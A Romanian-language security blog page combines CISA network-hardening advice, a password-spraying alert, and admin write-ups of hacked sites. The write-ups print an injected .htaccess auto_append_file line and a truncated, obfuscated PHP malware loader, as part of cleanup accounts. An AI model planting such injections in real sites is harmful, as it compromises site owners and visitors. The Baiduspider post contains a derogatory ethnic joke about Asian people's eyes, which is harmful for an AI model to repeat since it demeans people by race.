Securing Network Infrastructure Devices – Sfaturi de securizare

Network infrastructure devices are ideal targets for malicious cyber actors. Most or all organizational and customer traffic must traverse these critical devices.

  • An attacker with presence on an organization’s gateway router can monitor, modify, and deny traffic to and from the organization.
  • An attacker with presence on an organization’s internal routing and switching infrastructure can monitor, modify, and deny traffic to and from key hosts inside the network and leverage trust relationships to conduct lateral movement to other hosts.

Organizations and individuals that use legacy, unencrypted protocols to manage hosts and services, make successful credential harvesting easy for these malicious cyber actors. Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.

What are network infrastructure devices?

Network infrastructure devices are the physical components of a network that transport communications needed for data, applications, services, and multi-media. These devices include routers, firewalls, switches, servers, load-balancers, intrusion detection systems, domain name systems, and storage area networks.

What security threats are associated with network infrastructure devices?

Network infrastructure devices are often easy targets for attackers. Once installed, many network devices are not maintained at the same security level as general-purpose desktops and servers. The following factors can also contribute to the vulnerability of network devices:

  • Few network devices—especially small office/home office and residential-class routers—run antivirus, integrity-maintenance, and other security tools that help protect general-purpose hosts.
  • Manufacturers build and distribute these network devices with exploitable services, which are enabled for ease of installation, operation, and maintenance.
  • Owners and operators of network devices often don’t change vendor default settings, harden them for operations, or perform regular patching.
  • Internet service providers may not replace equipment on a customer’s property once the equipment is no longer supported by the manufacturer or vendor.
  • Owners and operators often overlook network devices when they investigate, look for intruders, and restore general-purpose hosts after cyber intrusions.


How can you improve the security of network infrastructure devices?

NCCIC encourages users and network administrators to implement the following recommendations to better secure their network infrastructure:

  • Segment and segregate networks and functions.
  • Limit unnecessary lateral communications.
  • Harden network devices.
  • Secure access to infrastructure devices.
  • Perform Out-of-Band network management.
  • Validate integrity of hardware and software.

Segment and Segregate Networks and Functions

Security architects must consider the overall infrastructure layout, including segmentation and segregation. Proper network segmentation is an effective security mechanism to prevent an intruder from propagating exploits or laterally moving around an internal network. On a poorly segmented network, intruders are able to extend their impact to control critical devices or gain access to sensitive data and intellectual property. Segregation separates network segments based on role and functionality. A securely segregated network can contain malicious occurrences, reducing the impact from intruders in the event that they have gained a foothold somewhere inside the network.

Physical Separation of Sensitive Information

Traditional network devices, such as routers, can separate local area network (LAN) segments. Organizations can place routers between networks to create boundaries, increase the number of broadcast domains, and effectively filter users’ broadcast traffic. Organizations can use these boundaries to contain security breaches by restricting traffic to separate segments and can even shut down segments of the network during an intrusion, restricting adversary access.


  • Implement principles of least privilege and need-to-know when designing network segments.
  • Separate sensitive information and security requirements into network segments.
  • Apply security recommendations and secure configurations to all network segments and network layers.

Virtual Separation of Sensitive Information

As technologies change, new strategies are developed to improve information technology efficiencies and network security controls. Virtual separation is the logical isolation of networks on the same physical network. Virtual segmentation uses the same design principles as physical segmentation but requires no additional hardware. Existing technologies can be used to prevent an intruder from breaching other internal network segments.


  • Use private virtual LANs to isolate a user from the rest of the broadcast domains.
  • Use virtual routing and forwarding (VRF) technology to segment network traffic over multiple routing tables simultaneously on a single router.
  • Use virtual private networks (VPNs) to securely extend a host/network by tunneling through public or private networks.

Limit Unnecessary Lateral Communications

Allowing unfiltered peer-to-peer communications, including workstation-to-workstation, creates serious vulnerabilities and can allow a network intruder’s access to spread easily to multiple systems. Once an intruder establishes an effective beachhead within the network, unfiltered lateral communications allow the intruder to create backdoors throughout the network. Backdoors help the intruder maintain persistence within the network and hinder defenders’ efforts to contain and eradicate the intruder.


  • Restrict communications using host-based firewall rules to deny the flow of packets from other hosts in the network. The firewall rules can be created to filter on a host device, user, program, or internet protocol (IP) address to limit access from services and systems.
  • Implement a VLAN Access Control List (VACL), a filter that controls access to and from VLANs. VACL filters should be created to deny packets the ability to flow to other VLANs.
  • Logically segregate the network using physical or virtual separation, allowing network administrators to isolate critical devices onto network segments.

Harden Network Devices

A fundamental way to enhance network infrastructure security is to safeguard networking devices with secure configurations. Government agencies, organizations, and vendors supply a wide range of guidance to administrators—including benchmarks and best practices—on how to harden network devices. Administrators should implement the following recommendations in conjunction with laws, regulations, site security policies, standards, and industry best practices.


  • Disable unencrypted remote admin protocols used to manage network infrastructure (e.g., Telnet, File Transfer Protocol [FTP]).
  • Disable unnecessary services (e.g., discovery protocols, source routing, Hypertext Transfer Protocol, Simple Network Management Protocol [SNMP], Bootstrap Protocol).
  • Use SNMPv3 (or subsequent version), but do not use SNMP community strings.
  • Secure access to the console, auxiliary, and virtual terminal lines.
  • Implement robust password policies, and use the strongest password encryption available.
  • Protect routers and switches by controlling access lists for remote administration.
  • Restrict physical access to routers and switches.
  • Back up configurations and store them offline. Use the latest version of the network device operating system and keep it updated with all patches.
  • Periodically test security configurations against security requirements.
  • Protect configuration files with encryption or access controls when sending, storing, and backing up files.

Secure Access to Infrastructure Devices

Administrative privileges can be granted to allow users access to resources that are not widely available. Limiting administrative privileges for infrastructure devices is crucial to security because intruders can exploit administrative privileges that are improperly authorized, granted widely, or not closely audited. Adversaries can use these compromised privileges to traverse a network, expand access, and take full control of the infrastructure backbone. Organizations can mitigate unauthorized infrastructure access by implementing secure access policies and procedures.


  • Implement multi-factor authentication (MFA). Authentication is a process used to validate a user’s identity. Attackers commonly exploit weak authentication processes. MFA uses at least two identity components to authenticate a user’s identity. Identity components include
    • something the user knows (e.g., password),
    • an object the user has possession of (e.g., token), and
    • a trait unique to the user (e.g., fingerprint).
  • Manage privileged access. Use a server that provides authentication, authorization, and accounting (AAA) services to store access information for network device management. An AAA server will enable network administrators to assign different privilege levels to users based on the principle of least privilege. When a user tries to execute an unauthorized command, it will be rejected. If possible, implement a hard-token authentication server in addition to using the AAA server. Using MFA makes it more difficult for intruders to steal and reuse credentials to gain access to network devices.
  • Manage administrative credentials. Take these actions if your system cannot meet the MFA best practice:
    • Change default passwords.
    • Recommend passwords to be at least 8 characters long, and allow passwords as long as 64 characters (or greater), in accordance with the National Institute of Standards and Technology’s SP 800-63B Digital Identity Guidelines and Canada’s User Authentication Guidance for Information Technology Systems ITSP.30.031 V3.
    • Check passwords against blacklists of unacceptable values, such as commonly used, expected, or compromised passwords.
    • Ensure all stored passwords are salted and hashed.
    • Keep passwords stored for emergency access in a protected off-network location, such as a safe.

Perform Out-of-Band Management

Out-of-Band (OoB) management uses alternate communication paths to remotely manage network infrastructure devices. These dedicated communication paths can vary in configuration to include anything from virtual tunneling to physical separation. Using OoB access to manage the network infrastructure will strengthen security by limiting access and separating user traffic from network management traffic. OoB management provides security monitoring and can perform corrective actions without allowing the adversary (even one who has already compromised a portion of the network) to observe these changes.

OoB management can be implemented physically, virtually, or through a hybrid of the two. Although additional physical network infrastructure additional infrastructure can be very expensive to implement and maintain, it is the most secure option for network managers to adopt. Virtual implementation is less costly but still requires significant configuration changes and administration. In some situations, such as access to remote locations, virtual encrypted tunnels may be the only viable option.


  • Segregate standard network traffic from management traffic.
  • Ensure that management traffic on devices comes only from OoB.
  • Apply encryption to all management channels.
  • Encrypt all remote access to infrastructure devices such as terminal or dial-in servers.
  • Manage all administrative functions from a dedicated, fully patched host over a secure channel, preferably on OoB.
  • Harden network management devices by testing patches, turning off unnecessary services on routers and switches, and enforcing strong password policies. Monitor the network and review logs. Implement access controls that only permit required administrative or management services (e.g., SNMP, Network Time Protocol, Secure Shell, FTP, Trivial File Transfer Protocol, RDP, SMB).

Validate Integrity of Hardware and Software

Products purchased through unauthorized channels are often counterfeit, secondary, or grey market devices. Numerous media reports have described the introduction of grey market hardware and software into the marketplace. Illegitimate hardware and software present a serious risk to users’ information and the overall integrity of the network environment. Grey market products can introduce risks to the network because they have not been thoroughly tested to meet quality standards. Purchasing products from the secondary market carries the risk of acquiring counterfeit, stolen, or second-hand devices because of supply chain breaches. Furthermore, breaches in the supply chain provide an opportunity for malicious software and hardware to be installed on the equipment. Compromised hardware and software can affect network performance and compromise the confidentiality, integrity, or availability of network assets. Finally, unauthorized or malicious software can be loaded onto a device after it is in operational use, so organizations should regularly check the integrity of software.


  • Maintain strict control of the supply chain and purchase only from authorized resellers.
  • Require resellers to enforce integrity checks of the supply chain to validate hardware and software authenticity.
  • Upon installation, inspect all devices for signs of tampering.
  • Validate serial numbers from multiple sources.
  • Download software, updates, patches, and upgrades from validated sources.
  • Perform hash verification, and compare values against the vendor’s database to detect unauthorized modification to the firmware.
  • Monitor and log devices—verifying network configurations of devices—on a regular schedule.
  • Train network owners, administrators, and procurement personnel to increase awareness of grey market devices.

Continue reading

Related Images:

Password spraying – aplicare de cosmetice in calculatoare

In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in a targeted account getting locked-out, as commonly used account-lockout policies allow 3-to-5 bad attempts during a set period of time. During a password-spray attack (also known as the low-and-slow method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.

Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise.

Email applications are also a target. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization’s email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire companys email address list, and/or (4) surreptitiously implements inbox rules for the forwarding of sent and received messages.

Technical Details

Traditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:

  • Use social engineering tactics to perform online research (i.e., Google search, LinkedIn, etc.) to identify target organizations and specific user accounts for initial password spray
  • Using easy-to-guess passwords (e.g., Winter2018, Password123!) and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication method
  • Leveraging the initial group of compromised accounts, download the Global Address List (GAL) from a targets email client, and perform a larger password spray against legitimate accounts
  • Using the compromised access, malicious actors attempt to expand laterally (e.g., via Remote Desktop Protocol) within the network, and perform mass data exfiltration using File Transfer Protocol tools such as FileZilla

Indicators of a password spray attack include:

  • A massive spike in attempted logons against the enterprise SSO Portal or web-based application. Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String). Attacks have been seen to run for over two hours
  • Employee logons from IP addresses resolving to locations inconsistent with their normal locations

Typical Victim Environment

The vast majority of known password spray victims share some of the following characteristics [1] [ ][2] [ ]:

* Use SSO or web-based applications with federated authentication method
* Lack multifactor authentication (MFA)
* Allow easy-to-guess passwords (e.g., Winter2018, Password123!)
* Use inbox synchronization allowing email to be pulled from cloud environments to remote devices
* Allow email forwarding to be setup at the user level
* Limited logging setup creating difficulty during post-event investigations


A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:

* Temporary or permanent loss of sensitive or proprietary information
* Disruption to regular operations
* Financial losses incurred to restore systems and files
* Potential harm to an organizations reputation


Recommended Mitigations

To help deter this style of attack, the following steps should be taken:
* Enable MFA and review MFA settings to ensure coverage over all active, internet facing protocols
* Review password policies to ensure they align with the latest NIST guidelines and deter the use of easy-to-guess passwords
* Review IT Helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT Helpdesk password procedures may not align to company policy, creating an exploitable security gap
* In addition, many companies offer additional assistance and tools the can help detect and prevent password spray attacks, such as the Microsoft blog released on March 5, 2018 (link below):

TA18-086A: Brute Force Attacks Conducted by Cyber Actors
U.S. Department of Homeland Security US-CERT

Related Images:

WordPress 3.2.1 spart prin fisierele temei

Titlul este pompos ca in ziare si reviste. Pana la urma WordPress-ul a fost spart prin intermediul unei teme (theme, layout, sablon etc, cum ii zice fiecare). Aveam pe server mai multe teme gratuite oferite de mai multe site-uri (printre care si si foloseam doar cateva dintre ele. Si prin una din ele, s-a putut intra si incarca pe server fisier cu cod PHP.

Orice programator mai rasarit – care mai face cracking, hacking – stie ca in momentul in care poti pune un fisier PHP pe un server, poti face multe pornind de acolo. Depinde ce doresti sa faci.


Am incercat sa astup groapa sapata de hacker si am folosit mai multe metode:

  • restaurarea fisierelor din back-up oferit de hosting
  • cautare de fisiere index.php si vizualizarea codului de la finalul fisierului
  • stergerea fisierelor ciudate de pe server (ex: Thumbs.db)
  • reinstalare de WordPress si alte site-uri
  • cautare de texte prin baza de date

Blogurile dadeau un mesaj ciudat in burtiera:

PHP Warning: Unknown: failed to open stream: No such file or directory in Unknown on line 0
PHP Fatal error: Unknown: Failed opening required '/home/abcdefg/public_html/abcdefgh/Thumbs.db' (include_path='.:/usr/lib/php:/usr/local/lib/php') in Unknown on line 0

Am reinstalat, am cautat si… nimic. Pana la urma hackerul se bagase in “.htaccess” si a adaugat linia de mai jos

php_value auto_append_file /home/abcdefg/public_html/abcdefg/Thumbs.db

deci degeaba cautam in codul php, caci era folosita metoda “auto_append_file”.

Succes la cei care au gropi de astupat!

Related Images:

Servere cu forumuri, wordpress-uri sparte de hackeri

In luna noiembrie 2011 am intalnit un server spart de hackeri. Pe scurt, fisierele index.php au fost editate si la final li s-a adaugat o linie lunga, ce contine urmatoarele linii (am taiat un pic din cârnații de caractere, pentru a nu pune codul în totalitate):

if (!isset($eva1fYlbakBcVSir)) {
$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn1XULdmbqZVUzElNmNTVGxEeNt1ZzkFcmJyJuUTNyZGJuciLxk2cwRCLiICKuVHdlJHJn4SNykmckRiLnsTKn4iInIiLnAkdX5Uc2dlTshEcMhHT8xFeMx2T4xjWkNTUwVGNdVzWvV1Wc9WT2wlbqZVX3lEclhTTKdWf8oEZzkVNdp2NwZGNVtVX8dmRPF3N1U2cVZDX4lVcdlWWKd2aZBnZtVFfNJ3N1U2cVZDX4lVcdl...";
$eva1tYldakBcVSir = "x73164x72162x65...";
$eva1tYldakBoVS1r = "x65143x61154x70...";
$eva1tYidokBoVSjr = "x3b51x29135x31...";
$eva1tYidakBcVSjr = $eva1tYldakBcVSjr(chr(2687.5*0.016), $eva1fYlbakBcVSir);
$eva1tYXdakAcVSjr = $eva1tYidakBcVSjr[0.031*0.061];
$eva1tYidokBcVSjr = $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;
$eva1tYldakBcVSir = "x73164x72x65143x72160164x72";
$eva1tYlbakBcVSir = "x67141x6f133x70170x65";
$eva1tYldakBoVS1r = "x65143x72160";
$eva1tYldakBcVSir = "";
$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;
$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;

Codul de mai sus nu functioneaza impreuna cu inca un fisier – numit Thumbs.db – si situat in acelasi director. Exempu de cod din acest fisier:

Continue reading

Related Images:

Buton Like de la Facebook, cu cod HTML gresit

In site-ul Facebook, in pagina de ajutor, exista instructiuni despre “Cum sa adaugi un buton Like la tine in site“. Numai ca codul HTML dat ca si exemplu de este dat gresit: tagul iframe nu este inchis.

Cod gresit (de la Facebook):

      <title>My Great Web page</title>
       <iframe src=""
        scrolling="no" frameborder="0"
        style="border:none; width:450px; height:80px"><iframe>

Pentru exemplul dat de ei, codul HTML corect este:

      <title>My Great Web page</title>
       <iframe src=""
        scrolling="no" frameborder="0"
        style="border:none; width:450px; height:80px"></iframe>

Succes la modificat!

Related Images:

Goana SEO si cum poti sa iti frigi site-ul

Toata lumea e innebunita dupa SEO. “Vreau SEO” este pe buzele tuturor, “Vreau pe prima pagina”, “De ce nu apar o data?”.

Google este o firma privata, care te adauga dupa criterilor lor interne. La fel ca si Bing, ca si Yahoo si multe alte motoare de cautare. Doar ei cunosc formula de calcul si cum sa te pozitioneze. Cine ofera consultanta SEO, are o baza de cunostinte despre acest coeficient si poate forta repozitionarea prin aplicarea mai multor actiuni asupra site-ului.

La un client cu peste 1000 de vizitatori zilnici, am gasit multe referinte (referrer) in statistica, de la un site romanesc care genereaza trafic. Ceea ce nu stie clientul ca acest trafic este generat de roboti. Este bine ca traficul creste, fie el generat prin software manual.

Partea proasta este cand acest site generator de trafic, are virusi. Doar Google va sti daca va “parfuma” negativ site-ul clientului, daca generatorul de trafic este considerat “malware”.

La o analiza a site-ului generator de trafic, am gasit:
– foloseste “10 mii de statistici”:,,,,,, google analytics
– include scripturi de la, si

Cand unele din aceste scripturi javascript sunt “hackuite”, site-ul tau va propaga hackingul, servind vizitatorului scripturi ce incerca tot felul de chestii: instalare de plug-in-uri, executie de java applet-uri, accesare de conturi

Firef0x-ul 3.6 a stiut sa ceara permisiuni de instalare si sa blocheze applet-urile, dar ce se face un user care si-a dat peste cap setarile de securitate? Se viruseaza si suna apoi un prieten.

exception: access denied (java.util.PropertyPermision user.home read).

Succes la devirusat!

Related Images:

Despre virusul TrojanClicker Iframe

In ultimele luni a aparut un nou mod de hacking de site-uri: instalarea in ele de iFrame-uri, prin scripturi javascript. Ultima versiune pe care a trebuit sa o scot a fost TrojanClicker.Iframe.GT.gen trojan. Aceasta era instalat intr-un fisier index.php al unui site. Atacul de azi a venit din Singapore de la hostul

Ce modifica astfel de virus si cum se instaleaza in site?

Virusul modifica fisierele cu denumiri cheie: “index.php”, “login.php”, “index.html”, “config.php” etc.
Modificarea fisierelor se face prin download + modificare + upload prin FTP. Deci modifica parola de FTP daca esti virusat!

Ce trebuie sa faci ca sa scoti astfel de virusi dintr-un site?

  • schimba parolele de FTP. (Este o solutie pana la urmatoarea versiune de virus)
  • schimba parolele de MySQL. Daca aveau acces la FTP, deci pot citi si fisiere de configurare de la baza de date.
  • copiaza fisierele site-ului pe server dintr-un back-up. Daca nu ai back-up, fa-ti!
  • urmareaste log-ul de FTP pentru a gasi hostul de unde s-a instalat si blockeaza-l prin .htaccess
  • pune-ti intrebari de genul: “Cum de a aflat parola de FTP instalatorul virusului?”

Exemple ale actionarii virusilor de tip “IFrame”

– codul inserat exporta PDF-uri care exploateaza bug-uri ale Acrobat Reader-ului
– codul javascript deschide site-uri de cumparaturi
– functiile virusilor contin denumire de genul: “tmp_lkojfghx”, “base64_decode(‘aWYoaXNzZXQ”. Cauta toate fisierele care ar putea contine astfel de cuvinte si inlocuieste-le cu unele “curate”, dintr-un back-up.

Related Images:

China ataca prin roboti de indexare

Azi am gasit in statistici zeci de hosturi de genul 123.125.66.* si am cautat ce robot foloseste clasa aceasta. Este un chinez pe nume Baiduspider. Este suspectat ca ar fii japonez, cert este ca are ochii mici.

Baiduspider is a Baidu search engine automatic procedure. Its function is visits on the Internet the html homepage, establishes the index database, enables the user to search the expensive website in the Baidu search engine the homepage.

Why does baiduspider massively visit my homepage?
After baiduspider visits your homepage, can on the automated analysis each homepage writing content and the memory homepage website, then other 网友 can find your homepage through hundred search engines. If baiduspider does not visit your homepage, then possesses through baiduspider provides the homepage information the search engine all not to be able to find your homepage, in other words, other 网友 and so on several dozens search the website in hundred Sina Yahoo! Tom to be able not to be able to find your homepage. You may arrive here further to understand the search engine.

Continue reading

Related Images: